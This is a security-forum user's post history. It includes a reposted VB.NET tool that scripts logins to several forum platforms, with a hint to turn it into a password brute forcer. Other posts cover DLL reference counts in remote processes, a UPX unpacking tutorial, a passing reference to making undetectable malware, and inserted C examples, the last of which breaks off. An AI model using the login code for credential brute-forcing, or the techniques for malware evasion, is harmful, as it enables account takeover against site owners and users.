Everything posted by me.mello

  1. So if it works on RST, buy me a beer. The original article has for some time been modified from phpBB3 to MyBB and vice versa :))... it has passed through many leechers, but it's very useful if you have an idea what to do with it, so I'll say:

Author: Anonim

I've approached a slightly OOP way to code this. I used different classes and an abstract class named 'Forum'. Simple web requests are used for the connections. Comments are welcome.

At this moment, it is possible to login to:
- phpBB2
- phpBB3
- myBB
- vBulletin (latest version)
- IPB2

I'll add IPBv3 & SMF later on. If you want me to add more forums, just reply.

Class 'Forum'

      'Written by Webhouse @ HF, please add credits if you use this.
      Public MustInherit Class Forum
          Private _logindata As String
          Private _loginUrl As String
          Private _url As String
          Private _username As String
          Private _defaultCookieName As String
          Private _defaultCookieSearch As String

          Public Sub New(ByVal url As String, ByVal loginUrl As String, ByVal username As String, _
                         ByVal cookieName As String, ByVal cookieSearch As String, Optional ByVal data As String = "")
              Me._url = url
              Me.loginUrl = loginUrl
              Me.logindata = data
              Me.username = username
              Me._defaultCookieName = cookieName
              Me._defaultCookieSearch = cookieSearch
          End Sub

          'Each forum type decides from the cookies whether the login succeeded.
          Public MustOverride Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean

          Public Property logindata As String
              Get
                  Return Me._logindata
              End Get
              Set(ByVal value As String)
                  Me._logindata = value
              End Set
          End Property

          Public Property url As String
              Get
                  Return Me._url
              End Get
              Set(ByVal value As String)
                  Me._url = value
              End Set
          End Property

          Public Property loginUrl As String
              Get
                  Return Me._loginUrl
              End Get
              Set(ByVal value As String)
                  Me._loginUrl = value
              End Set
          End Property

          Public Property username As String
              Get
                  Return Me._username
              End Get
              Set(ByVal value As String)
                  Me._username = value
              End Set
          End Property

          Public Property defaultCookieName As String
              Get
                  Return Me._defaultCookieName
              End Get
              Set(ByVal value As String)
                  Me._defaultCookieName = value
              End Set
          End Property

          Public Property defaultCookieSearch As String
              Get
                  Return Me._defaultCookieSearch
              End Get
              Set(ByVal value As String)
                  Me._defaultCookieSearch = value
              End Set
          End Property
      End Class

Class 'HTTPWorker'

      'Written by Webhouse @ HF, please add credits if you use this.
      Imports System.Net
      Imports System.Text
      Imports System.IO.Compression

      Public Class HTTPWorker
          Public Shared cookies As CookieContainer
          Private data As Byte()

          Public Function login(ByVal forumInstance As Forum) As Boolean
              Dim request As HttpWebRequest
              Dim response As HttpWebResponse
              Dim stream As IO.Stream
              cookies = New CookieContainer
              Try
                  request = WebRequest.Create(forumInstance.loginUrl)
                  setConnectionParameters(request)
                  data = Encoding.ASCII.GetBytes(forumInstance.logindata)
                  request.ContentLength = data.Length
                  stream = request.GetRequestStream()
                  stream.Write(data, 0, data.Length)
                  stream.Flush()
                  stream.Close()
                  response = request.GetResponse()
                  'the cookies are already in the container here; close the response so the connection is released
                  response.Close()
                  If forumInstance.isLoggedIn(cookies) Then
                      Return True
                  End If
              Catch ex As Exception
                  'do something with the exception
              End Try
              Return False
          End Function

          Public Sub setConnectionParameters(ByRef request As HttpWebRequest)
              With request
                  .Method = "POST"
                  .Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
                  .ContentType = "application/x-www-form-urlencoded"
                  .Proxy = Nothing
                  .CookieContainer = cookies
                  .KeepAlive = True
                  .ServicePoint.Expect100Continue = False
                  .UserAgent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8) Gecko/20051111 Firefox/1.5; FBI-version/0.07"
                  '.Headers.Add(HttpRequestHeader.AcceptEncoding, "gzip,deflate") if you want to speed up the stream reading (most boards support this)
              End With
          End Sub

          'this function is not implemented, it is added to show how to link the cookies from the login
          Public Sub navTo()
              'Dim request As HttpWebRequest
              'request.CookieContainer = cookies
              'etc etc: you could set idle time, speed if you simultaneously want to fire requests, headers, method (get/post), etc
          End Sub

          'Note: to read the result in login()
          '--If you want to read the result (using compression techniques to speed it up)--
          'Dim responseStream As IO.Stream = response.GetResponseStream()
          'If (response.ContentEncoding.ToLower().Contains("gzip")) Then
          '    responseStream = New GZipStream(responseStream, CompressionMode.Decompress)
          'ElseIf (response.ContentEncoding.ToLower().Contains("deflate")) Then
          '    responseStream = New DeflateStream(responseStream, CompressionMode.Decompress)
          'End If
          'Dim streamReader As IO.StreamReader = New IO.StreamReader(responseStream, Encoding.Default)
          'Dim result As String = streamReader.ReadToEnd().Trim()
          'streamReader.Close()
          '--
      End Class

Class 'phpBB2'

      'Written by Webhouse @ HF, please add credits if you use this.
      Imports System.Net

      Public Class phpBB2
          Inherits Forum

          Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String)
              MyBase.New(url, url & "/login.php", username, "phpBB_WBB_data", "userid%22%3Bi%3A-1%3B%7D", _
                         "&username=" + username + "&password=" + password + "&autologin=on&login=Log+in")
          End Sub

          'logged in when the data cookie no longer carries the anonymous user id marker
          Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean
              'Item() returns Nothing when the cookie is absent; guard against that instead of throwing
              Dim c As Cookie = cookies.GetCookies(New Uri(url)).Item(defaultCookieName)
              If Not IsNothing(c) AndAlso Not c.Value.Contains(defaultCookieSearch) Then
                  Return True
              End If
              Return False
          End Function
      End Class

Class 'phpBB3'

      'Written by Webhouse @ HF, please add credits if you use this.
      Imports System.Net

      Public Class phpBB3
          Inherits Forum

          'note: phpBB3 generates the cookie name prefix per installation, so "phpbb3_1fh61_u" has to be adjusted per board
          Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String)
              MyBase.New(url, url & "/ucp.php?mode=login", username, "phpbb3_1fh61_u", "1", _
                         "username=" + username + "&password=" + password + "&redirect=&sid=&redirect=&login=Login")
          End Sub

          'logged in when the user id cookie is something other than "1" (the anonymous user)
          Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean
              Dim c As Cookie = cookies.GetCookies(New Uri(url)).Item(defaultCookieName)
              If Not IsNothing(c) AndAlso Not c.Value.Equals(defaultCookieSearch) Then
                  Return True
              End If
              Return False
          End Function
      End Class

Class 'myBB'

      'Written by Webhouse @ HF, please add credits if you use this.
      Imports System.Net

      Public Class myBB
          Inherits Forum

          Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String)
              MyBase.New(url, url & "/member.php?action=login", username, "mybbuser", "", _
                         "username=" + username & "&password=" + password & "&submit=Login&action=do_login&url=")
          End Sub

          'logged in as soon as the user cookie exists
          Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean
              If Not IsNothing(cookies.GetCookies(New Uri(url)).Item(defaultCookieName)) Then
                  Return True
              End If
              Return False
          End Function
      End Class

Class 'vBulletin'

      'Written by Webhouse @ HF, please add credits if you use this.
      Public Class vBulletin
          Inherits Forum

          Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String)
              MyBase.New(url, url & "/login.php?do=login", username, "vbseo_loggedin", "yes")
              MyBase.logindata = "vb_login_username=" + username + "&vb_login_password=" + password + _
                                 "&cookieuser=1&s=&securitytoken=guest&do=login&vb_login_md5password=" + Md5String(password) + _
                                 "&vb_login_md5password_utf=" + Md5String(password)
          End Sub

          Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean
              If Not IsNothing(cookies.GetCookies(New Uri(url)).Item(defaultCookieName)) Then
                  If cookies.GetCookies(New Uri(url)).Item(defaultCookieName).Value.Contains(defaultCookieSearch) Then
                      Return True
                  End If
              End If
              Return False
          End Function

          'vBulletin posts the MD5 of the password alongside the plain one; hex-encode the digest
          Private Function Md5String(ByVal v As String) As String
              Dim myProv As New System.Security.Cryptography.MD5CryptoServiceProvider
              Dim b As Byte() = System.Text.Encoding.ASCII.GetBytes(v)
              b = myProv.ComputeHash(b)
              Dim str As String = ""
              Dim i As Integer
              For i = 0 To b.Length - 1
                  str = (str & b(i).ToString("x2").ToLower)
              Next i
              Return str
          End Function
      End Class

Class 'IPB2'

      Public Class IPBoard2
          Inherits Forum

          Public Sub New(ByVal url As String, ByVal username As String, ByVal password As String)
              MyBase.New(url, url & "/index.php?act=Login&CODE=01", username, "ipb_username", "", _
                         "&referer=" + url + "&UserName=" + username + "&PassWord=" + password + "&CookieDate=1")
          End Sub

          Public Overrides Function isLoggedIn(ByVal cookies As System.Net.CookieContainer) As Boolean
              If Not IsNothing(cookies.GetCookies(New Uri(url)).Item(defaultCookieName)) Then
                  Return True
              End If
              Return False
          End Function
      End Class

Notes:

The only reason I have put the actual forums in different classes is because:
- A different version can have different functionalities you want to implement
- The post string is different (I could have put a string container though for all the classes, but I didn't ~ see previous point)

If you want to add different types of forums, just let your forum inherit from the class 'Forum'; you'll want to include a cookie name (and maybe value) to verify if the user is logged in. You'll always need to override the isLoggedIn() method as well. I don't read the actual HTML from the response because it is just a waste of time; checking cookies is much faster. You can easily change the sync web requests into async ones if you would want to login to different sites simultaneously. I might post a tutorial later on about this.

Examples to add forum objects and login:

      Dim wrkr As New HTTPWorker()

      Dim phpBB2Forum As New phpBB2("http://www.myurl.com", "username", "pass")
      wrkr.login(phpBB2Forum)

      Dim vBulletinForum As New vBulletin("http://www.myurl.com", "username", "pass")
      wrkr.login(vBulletinForum)

      Dim myBBForum As New myBB("http://www.myurl.com", "username", "pass")
      wrkr.login(myBBForum)

      Dim phpBB3Forum As New phpBB3("http://www.myurl.com", "username", "pass")
      wrkr.login(phpBB3Forum)

I'll say it once more: All credits to the original poster!! Now raise your hand if you haven't already thought of a brute forcer =))
  2. What's nicer than MoveMemory and CopyMemory :X Great, I already have ideas for improving ExecuteBytes; you posted something like this in C++ too, if I'm not mistaken. The function is a bit choppy... I don't see ZeroMemory or CloseHandle on hProcess or hThread, but he probably did the standard version; when you work with functions like these you also free them at the end, MoveMemory is a fairly volatile function, especially in VB. Anyway, the function is great, it's something different from what I'd seen in the past.
  3. Yes @paul, you confirmed exactly what I said too. Now I don't know what you think, but if you come to me tomorrow with a cliche like DDoS, am I supposed to call you a hacker? The American government spends more money on manufacturing weapons than on fighting all the diseases for which no cure has been found yet; if ever the government of a bigger and more important country gets attacked, measures will be taken, and I'd bet my balls that those guys will be caught in the future. Don't forget, I've said it before and I'll say it again: Central America has a more or less well-organized system, they boast that every bit that leaves or enters the country is logged... well, given how many come in, I'm not saying the employees do such a great job :)) (logged doesn't mean secured, or that NASA can no longer be broken into by Mr. Tinky :)) ), and in case of a bigger attack... they will know exactly the source/type of the attack and where it comes from, as in the case of the attacks from China. As proof, the Turks confirmed this; it has to happen to you once, the second time you're cautious... and at government level money is not the problem: you have money, you hire 2, 10, umpteen fresh kids out of Harvard who find you together with your bots and n proxies. Conclusion: As long as you remain a myth, with your own tools, no government will ever lay a claw on you, whether you're a legion/clan/group/kindergarten/solo.
  4. 10-15 years ago, if you were a known hacker group you had custom tools; what do these guys have??? DDoS? Let's be serious... it reminds me of another similar topic. Out of as many as they think they are... a legion, can't a single one be found to write a good piece of software??? To find a type of attack that will become a cliche in the future?? If it were a well-organized group you could call a legion... you'd go public after you had some 3-4 years of ASM and some 5-6 Cisco certificates, and if you recruited a legion you wouldn't give a damn... but at least 50% should have a clue and discover attack types, 100% private vulnerabilities + tools made by themselves. In the past I don't think the Chinese even had PCs back when in Spain 1 in 5 people aged 16-25 was a hacker; there was a documentary about it too, and it said quite clearly: we are from x-team, we have custom tools, I paid someone this much $$ for this tool, that is what sets us apart from the others. If you keep it to DDoS-type cliches, of course you have no hope of "changing the world" as they declare. These days, whether you go out in the street and threaten to set yourself on fire, or you attack those companies and DDoS them, you can't change the world; sometimes that's how things have to go. You haven't discovered anything and you're already forming a hacker legion; impressions like that you keep within four walls, because money will always be found to counter some kids out for a laugh; there are people with degrees, with years of research in the field, who can't wait for some extra cash. Honestly, I don't think they are that sharp, although I do think it will cause a stir among hackers, be they minors :)) or older.
It would be good if they anonymized themselves; I think it would solve something in the end... anyway I sense the "Netscape" cliche: if they fall, others will come to lay down the law, it may be just the beginning... damn, these days you can even hack a car, what the hell :)) @FearDotCom: I couldn't help coming back with an edit for you :)) man, do you have any idea that a Frenchman broke the world record and reached a bandwidth of 7.2 tera (to put it in plain Romanian) per second over a distance of 7040 kilometers?? The previous record had been 3.2 Tb/s; when will you ever solve anything with DDoS in this life?? Do you have any idea that since then it has probably reached 10 Tb/s? If they also have protection, even if you doubled the PCs on this small, round planet you couldn't match them... I'm saying this because, thanks to this French individual, many governments took this measure.... they have the bandwidth to make mincemeat of your bots, man @FearDotCom, and if you don't believe me I actually have the magazine in front of me, it comes monthly in the mail :D Technology Review September/October 2010, page 66.
  5. A great article; once you get the hang of it you'll easily learn to inject/remove a .dll from any remote process you want.

About the DLL Reference Count

The reference count or load count of a DLL is the number of times the DLL is loaded into the process. Each time the DLL is loaded (through LoadLibrary) into the process its reference count is incremented by 1, and each time the DLL is freed (through FreeLibrary) from the process, its reference count is decremented by 1. When the reference count reaches 0, the DLL is completely unmapped from the process. The Windows APIs do not give much information about loaded DLLs. Windows provides the Tool Help library to retrieve information about DLLs loaded into a process, but it gives very basic information such as the name and handle of the DLL. In order to get more information, one needs to dig deeper into the Windows world.

How to find the DLL Reference Count?

The reference count for the DLL is stored in the PEB (Process Environment Block) of that process. The PEB contains the linked list of DLL module structures which contain complete information about that particular DLL. Here are the detailed steps.

1. Get the address of the PEB block

The PEB block for any process is usually found at address 0x7ffdf000. However, there is a standard way to get this address. There is an undocumented function ZwQueryInformationProcess in NTDLL.DLL which can be used to retrieve the PROCESS_BASIC_INFORMATION. The PBI structure is shown below.

      struct _PROCESS_BASIC_INFORMATION {
          PVOID     Reserved1;
          PPEB      PebBaseAddress;
          PVOID     Reserved2[2];
          ULONG_PTR UniqueProcessId;
          PVOID     Reserved3;
      } PROCESS_BASIC_INFORMATION;

The second member PebBaseAddress contains the address of the PEB, which can be used to get the list of loaded modules.

2. Get the list of loaded DLLs from the PEB

Once you get the address of the PEB, you can use the ReadProcessMemory API to read the PEB from the target process.

      PEB peb;
      SIZE_T dwSize;
      // 16 bytes is enough to reach the Ldr pointer of a 32-bit PEB (offset 0x0C); a 64-bit PEB keeps it at 0x18
      ReadProcessMemory(hprocess, pbi.PebBaseAddress, &peb, 16, &dwSize);

The PEB is a big structure, hence I cannot dump it here. One of the members that is interesting to us is PPEB_LDR_DATA, which is a pointer to the loader data structure containing the linked list of loaded modules. Now from the PEB, you can get the PEB_LDR_DATA structure as follows.

      PEB_LDR_DATA peb_ldr_data;
      ReadProcessMemory(hprocess, peb.Ldr, &peb_ldr_data, sizeof(peb_ldr_data), &dwSize);

      struct _PEB_LDR_DATA {
          ULONG      Length;
          UCHAR      Initialized;
          PVOID      SsHandle;
          LIST_ENTRY InLoadOrderModuleList;
          LIST_ENTRY InMemoryOrderModuleList;
          LIST_ENTRY InInitializationOrderModuleList;
          PVOID      EntryInProgress;
      } PEB_LDR_DATA, *PPEB_LDR_DATA;

The PEB_LDR_DATA structure contains the pointers to 3 linked lists, each of which lists the modules in a different order. Now it's just a matter of going through each module by following one of these linked lists.

3. Retrieve the load count of the DLL

Now we will go through each of the modules by following the InLoadOrderModuleList pointer. Information about each of these modules is retrieved using the ReadProcessMemory function. The structure LDR_MODULE representing each module is given below.

      struct _LDR_MODULE {
          LIST_ENTRY     InLoadOrderModuleList;
          LIST_ENTRY     InMemoryOrderModuleList;
          LIST_ENTRY     InInitializationOrderModuleList;
          PVOID          BaseAddress;
          PVOID          EntryPoint;
          ULONG          SizeOfImage;
          UNICODE_STRING FullDllName;
          UNICODE_STRING BaseDllName;
          ULONG          Flags;
          USHORT         LoadCount;
          USHORT         TlsIndex;
          LIST_ENTRY     HashTableEntry;
          ULONG          TimeDateStamp;
      } LDR_MODULE, *PLDR_MODULE;

It contains a lot of information about a module which you don't get using high level APIs. One of the members is LoadCount, which is nothing but the reference count of the DLL.

      LDR_MODULE peb_ldr_module;
      signed short loadCount;
      void *readAddr = (void *) peb_ldr_data.InLoadOrderModuleList.Flink;
      // The list is circular: the last module's Flink points back at the list head inside
      // the remote PEB_LDR_DATA, so stop there instead of looping until a read fails.
      void *listHead = (void *) &(((PPEB_LDR_DATA) peb.Ldr)->InLoadOrderModuleList);
      // Go through each module one by one in their load order.
      while (readAddr != listHead &&
             ReadProcessMemory(hprocess, readAddr, &peb_ldr_module, sizeof(peb_ldr_module), &dwSize))
      {
          // Get the reference count of the DLL
          loadCount = (signed short) peb_ldr_module.LoadCount;
          readAddr = (void *) peb_ldr_module.InLoadOrderModuleList.Flink;
      }

If the load count for a DLL is -1 then the DLL is statically linked, otherwise it is dynamically loaded.

Where will this be useful?

There are a number of instances when there is a need to know the reference count of a DLL. One typical case is when you want to free the DLL from a remote process. Many spyware programs use DLL injection or a similar technique to get themselves loaded into a legitimate Windows process and remain hidden from the normal user. In order to free such hidden DLLs from that process one must know the reference count so that it can be completely freed from that process. Unless the DLL is freed from the process, it cannot be removed from the disk. The reference count is also useful to determine if the DLL is statically or dynamically loaded.
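As an added example that is not part of the post or of the original article: the InLoadOrderModuleList walk from step 3, written in portable C against a constructed stand-in for the target process's memory, so it runs offline. read_mem plays the role of ReadProcessMemory, and the module list, its base address and the load counts are assumed values; the walk also shows the termination condition a live traversal needs, since the list is circular and the last Flink points back at the list head.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* The loader structures from the article, declared with fixed-width types so the
   traversal compiles on any platform. On Windows you would use the real definitions. */
typedef struct { uintptr_t Flink, Blink; } LIST_ENTRY;
typedef struct { uint16_t Length, MaximumLength; uintptr_t Buffer; } UNICODE_STRING;
typedef struct {
    LIST_ENTRY InLoadOrderModuleList;   /* first member: node address == LDR_MODULE address */
    LIST_ENTRY InMemoryOrderModuleList; /* following this list instead needs CONTAINING_RECORD */
    LIST_ENTRY InInitializationOrderModuleList;
    uintptr_t  BaseAddress;
    uintptr_t  EntryPoint;
    uint32_t   SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    uint32_t   Flags;
    uint16_t   LoadCount;               /* 0xFFFF (-1) for statically imported modules */
    uint16_t   TlsIndex;
} LDR_MODULE;

/* Constructed stand-in for the target's address space: a flat buffer that "lives" at
   REMOTE_BASE (assumed), with PEB_LDR_DATA.InLoadOrderModuleList at offset 0. */
#define REMOTE_BASE 0x00400000u
static uint8_t remote_mem[0x1000];

/* Same contract as ReadProcessMemory: copy [addr, addr+size) out of the target or fail. */
static bool read_mem(uintptr_t addr, void *out, size_t size) {
    if (addr < REMOTE_BASE || addr + size > REMOTE_BASE + sizeof remote_mem) return false;
    memcpy(out, remote_mem + (addr - REMOTE_BASE), size);
    return true;
}

/* Walks InLoadOrderModuleList from the list head and records each module's LoadCount
   as a signed value. The loop stops when Flink returns to the head (or on a read
   error, or after max entries); looping only "while the read succeeds" never ends. */
size_t collect_load_counts(uintptr_t list_head, int16_t *counts, size_t max) {
    LIST_ENTRY head;
    if (!read_mem(list_head, &head, sizeof head)) return 0;
    size_t n = 0;
    uintptr_t cur = head.Flink;
    while (cur != list_head && n < max) {
        LDR_MODULE m;
        if (!read_mem(cur, &m, sizeof m)) break;
        counts[n++] = (int16_t)m.LoadCount;
        cur = m.InLoadOrderModuleList.Flink;
    }
    return n;
}

/* A LoadCount of -1 marks a module mapped through the import table rather than LoadLibrary. */
bool is_static_import(int16_t load_count) { return load_count == -1; }

/* Builds the constructed module list: the exe and one normally imported DLL (both static)
   followed by a DLL whose LoadCount records two explicit LoadLibrary calls. */
uintptr_t build_sample_process(void) {
    const uintptr_t head = REMOTE_BASE;
    const uintptr_t node[3] = { REMOTE_BASE + 0x100, REMOTE_BASE + 0x200, REMOTE_BASE + 0x300 };
    const uint16_t  counts[3] = { 0xFFFF, 0xFFFF, 2 };
    memset(remote_mem, 0, sizeof remote_mem);
    LIST_ENTRY h = { node[0], node[2] };
    memcpy(remote_mem, &h, sizeof h);
    for (int i = 0; i < 3; i++) {
        LDR_MODULE m;
        memset(&m, 0, sizeof m);
        m.InLoadOrderModuleList.Flink = (i == 2) ? head : node[i + 1];
        m.InLoadOrderModuleList.Blink = (i == 0) ? head : node[i - 1];
        m.BaseAddress = 0x10000000u * (uint32_t)(i + 1);   /* assumed image bases */
        m.LoadCount = counts[i];
        memcpy(remote_mem + (node[i] - REMOTE_BASE), &m, sizeof m);
    }
    return head;
}

int main(void) {
    int16_t lc[8];
    size_t n = collect_load_counts(build_sample_process(), lc, 8);
    for (size_t i = 0; i < n; i++)
        printf("module %zu: LoadCount=%d (%s)\n", i, lc[i],
               is_static_import(lc[i]) ? "static" : "dynamic");
    return 0;
}
```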
  6. Yes, I know that little monkey from Offensive ;)) but it's a bit annoying with this in-time scanning... but if you make your own FUD it's still good to also rely on a technique like this (keep it as a handkerchief in your pocket).. who knows. http://rstcenter.com/forum/36270-manual-unpacking-upx-packed-binary-file.rst this can give you ideas too
  7. First of all, PHP doesn't have much to do with C++; one is for the web, the other is for applications.... As for C++, relax, you haven't hit the hard part yet.. it's easy when you include a library and bam... the little program is done, especially on Windows... but when it comes to algorithms and math in C++, then you say what the hell did I take up C++ for. As for PHP, I won't give my opinion because I don't know much; I chose to learn ASP, and for what I do I really don't need PHP. C++ is not web programming; if you were arguing with the guy about PHP vs. Java in HTML, well, that would be something else, but between PHP and C++ you can't make a comparison; however, as a programming language, yes, C++ is certainly more complicated, complex, hard. In this case he could be right: PHP can be insignificant if you have a certain "rope" you want to keep alive. You can't program mobile phones or little robots in PHP :)) And there would be jobs on any platform; it's not like the one programming in Java earns more than the one in .NET... that's a mistake, you'd be surprised how much an administrator earns on Groove (.NET). I'll tell you that for as long as I can remember I've worked on the .NET platform, and if you have the money to take a course abroad and get a certificate, not only I will tell you but others will too that they'll be waiting for you outside after the exam, each with a better contract than the next. For a few years now a modularity has developed on the web platform: you write Ruby, Python scripts, it comes easier... and plain PHP can't keep up... I don't think it has such a high level without Java. As for C++... well, it doesn't need anything; if you remember, those of you who know... the C programming language was made in C, hmm, how is that possible?? Conclusion: It doesn't matter whether you program in C++ or in PHP; if programming in PHP brings you or anyone else more $$ than the other guy who has worked in C++ all his life, it's really uninteresting. We live in a world that is starting to get uglier and uglier because of lack of money.
As for what your friend says, put him in his place if he has no clue how to make any money from any programming language :)
  8. Probably, and more than likely, it's not necessarily compiled in Visual C++ 2008; if it is, try with regular Visual C++, the one from 98. Visual C++ 2008 comes with the .NET Framework... and I don't think Mozilla is compiled with that :| One more thing... in C++ there's a big difference between compilers, so find out properly what it's compiled in; maybe what you found is in Dev C++ or RAD... etc.; not every piece of C++ code compiles with Dev C++, likewise with any of the Visual C++... etc. If compiling an open source project causes you problems, I now wonder how much of a clue you have about programming; if that's your problem, know that you should have known, it's a general rule. I say look over what I said, maybe it's part of the problem or even the whole thing; well, now it could also be from some runtime you don't have up to date, acting up at build time. PS: I have no idea what Mozilla is compiled in.
  9. Introduction

Here is a short tutorial on unpacking a UPX (http://upx.sourceforge.net/) packed binary file. UPX is a free, portable executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. To follow this tutorial you need to download the latest UPX packer from the UPX website (http://upx.sourceforge.net/) and then pack any PE (Windows executable) file with it.

Unpacking Steps

Before we begin with the unpacking exercise, let's try to understand the working of UPX. When you pack any executable with UPX, all existing sections of that file are compressed and appended with new UPX code which decompresses the entire packed sections at run time. During the execution of a UPX packed binary file, the following steps take place:
- First the current register status is saved through the PUSHAD instruction.
- Next all packed sections are unpacked.
- The import table of the original executable file is resolved.
- Once the job is done, the register status is restored via the POPAD instruction.
- Finally it jumps to the Original Entry Point (OEP).

Unpacking UPX

The manual unpacking process involves the following steps:
- Finding the OEP of the program.
- Dumping the memory image of the binary when the program reaches the OEP.
- Fixing the import table.

I am using the generic approach so that you will be able to unpack an executable which is packed with any version of UPX. Here I am using OllyDbg to unpack the PE file. Although you can use any debugger, OllyDbg is one of the best ring 3 debuggers for reverse engineering. That is all you needed to know before the start. Let's get into some action.

Load the UPX packed binary file into OllyDbg and start tracing the binary until you encounter a PUSHAD instruction. Usually this is the first instruction, or it will be present in the first few instructions, based on the UPX version that you have used to pack the PE file. Now put the breakpoint on the POPAD instruction. So when we reach the POPAD instruction, all the sections will be unpacked and all imports will be resolved. After the POPAD instruction, it will jump to the OEP.

There are many ways to set the breakpoint at the PUSHAD instruction. When you are at this instruction, you can put a hardware read breakpoint at the ESP-4 address. If you have the command bar plugin installed then you can just type 'hr esp-4' to set this breakpoint. The other way is to find the POPAD (opcode 61) instruction in the code and set the breakpoint yourself. You can just scroll down in OllyDbg from the current instruction till you find all zeroes; then just a few instructions above the start of the zeroes you will find the POPAD instruction. Now you can directly set a breakpoint on the POPAD instruction.

Once you have set the breakpoint, press F9 and you will break on the instruction which is immediately after POPAD, or on the POPAD instruction, based on which method you have used. Now start tracing with F7 and soon you will encounter an instruction which jumps to the OEP, which is somewhere in the unpacked code section. Now you have found the OEP. Note down this address somewhere.

The next task is to dump the entire binary image from memory. This can be done using the OllyDmp plugin which comes with OllyDbg. Now launch this plugin and dump the entire binary file to the disk using the default options. It will automatically fix the import table for you, so there is no need to explicitly fix it. That's it and you are done with unpacking the UPX packed file.

Fixing the Import Table

For most of the advanced packers, OllyDmp will not be able to fix the import table. In such a case, the following method will be helpful. Here, we will be using the ImpREC tool, which is a more advanced tool for fixing the import table. When you are at the OEP of the program, just dump the memory image of the binary file using OllyDmp without asking it to fix the import table. Next launch the ImpREC tool and select the process that you are currently debugging. Then in ImpREC, enter the OEP (enter only the RVA, not a complete address) and click on the 'IAT Autosearch' button to automatically search for the import table. Then click on 'Get Imports' to retrieve all the imported functions. You will see all the imported functions listed under their respective DLL names. If you find any import function which is invalid (marked as valid: No) then remove it by right clicking on it and then, from the popup menu, pressing 'Delete Thunks'. Now once the import functions are identified, click on the Fix Dump button in ImpREC and then select the previously dumped file. Once you have dumped the image from memory and fixed the import table, you can verify it by executing that application.

UPX Unpacked...!

That's all, you have successfully unpacked the UPX packed executable file. It's a great job, though it's the simplest packer without any anti-debugging features. As you move on, you will see more and more challenging protectors. Hope you have enjoyed your first unpacking lesson as I did years back..!
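As an added example that is not part of the post or of the original tutorial: a small C inspector for the section-table layout UPX leaves behind in a PE file, which is what a triage script would check before anyone opens the file in OllyDbg. It looks for the UPX0/UPX1 section names, for a first section that has a virtual size but no raw data on disk (the space the stub unpacks into), and for an entry point that sits in the stub section rather than in the section where the OEP will be. The PE image it checks is constructed inline with assumed section sizes and addresses so the check runs offline; on a real file you would read the bytes from disk.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* What the inspector reports about a PE image. */
typedef struct {
    int      num_sections;
    uint32_t entry_rva;               /* AddressOfEntryPoint from the optional header */
    int      entry_section;           /* index of the section containing entry_rva, -1 if none */
    bool     upx_section_names;       /* any section named UPX0, UPX1, ... */
    bool     first_section_virtual_only; /* first section has VirtualSize but SizeOfRawData == 0 */
} pe_pack_report;

/* Little-endian field accessors so the code is independent of host byte order. */
static uint32_t get16(const uint8_t *p, size_t off) { return p[off] | (p[off + 1] << 8); }
static uint32_t get32(const uint8_t *p, size_t off) { return get16(p, off) | (get16(p, off + 2) << 16); }
static void put16(uint8_t *p, size_t off, uint32_t v) { p[off] = v & 0xff; p[off + 1] = (v >> 8) & 0xff; }
static void put32(uint8_t *p, size_t off, uint32_t v) { put16(p, off, v & 0xffff); put16(p, off + 2, v >> 16); }

/* Parses the COFF header and section table of a PE32/PE32+ image held in memory.
   Returns false if the buffer is not a PE image or is truncated. */
bool inspect_pe(const uint8_t *img, size_t len, pe_pack_report *r) {
    memset(r, 0, sizeof *r);
    r->entry_section = -1;
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return false;
    size_t pe = get32(img, 0x3c);                         /* e_lfanew */
    if (pe + 24 > len || memcmp(img + pe, "PE\0\0", 4) != 0) return false;
    int    nsec     = (int)get16(img, pe + 6);            /* NumberOfSections */
    size_t opt_size = get16(img, pe + 20);                /* SizeOfOptionalHeader */
    size_t opt      = pe + 24;
    if (opt_size < 20 || opt + opt_size + (size_t)nsec * 40 > len) return false;
    r->num_sections = nsec;
    r->entry_rva = get32(img, opt + 16);                  /* same offset for PE32 and PE32+ */
    for (int i = 0; i < nsec; i++) {
        size_t sh = opt + opt_size + (size_t)i * 40;      /* IMAGE_SECTION_HEADER is 40 bytes */
        char name[9] = {0};
        memcpy(name, img + sh, 8);
        uint32_t vsize = get32(img, sh + 8), va = get32(img, sh + 12), raw = get32(img, sh + 16);
        if (strncmp(name, "UPX", 3) == 0) r->upx_section_names = true;
        if (i == 0 && vsize > 0 && raw == 0) r->first_section_virtual_only = true;
        uint32_t span = vsize ? vsize : raw;
        if (r->entry_rva >= va && r->entry_rva < va + span) r->entry_section = i;
    }
    return true;
}

/* Names alone are trivial to rename, so also accept the structural pattern:
   an empty-on-disk first section with the entry point in a later one. */
bool looks_upx_packed(const pe_pack_report *r) {
    return r->upx_section_names || (r->first_section_virtual_only && r->entry_section > 0);
}

/* Builds a constructed, minimal PE32 header with the three-section layout UPX produces:
   UPX0 (virtual only), UPX1 (stub + compressed data, holds the entry point), .rsrc.
   All sizes and addresses are assumed values, not taken from a real packed file. */
size_t build_sample_upx_image(uint8_t *buf, size_t cap) {
    const size_t pe = 0x40, opt = pe + 24, opt_size = 0xE0, shdr = opt + opt_size;
    const size_t need = shdr + 3 * 40;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    put32(buf, 0x3c, (uint32_t)pe);
    memcpy(buf + pe, "PE\0\0", 4);
    put16(buf, pe + 4, 0x014c);                 /* Machine: i386 */
    put16(buf, pe + 6, 3);                      /* NumberOfSections */
    put16(buf, pe + 20, (uint32_t)opt_size);    /* SizeOfOptionalHeader for PE32 */
    put16(buf, opt, 0x10b);                     /* Magic: PE32 */
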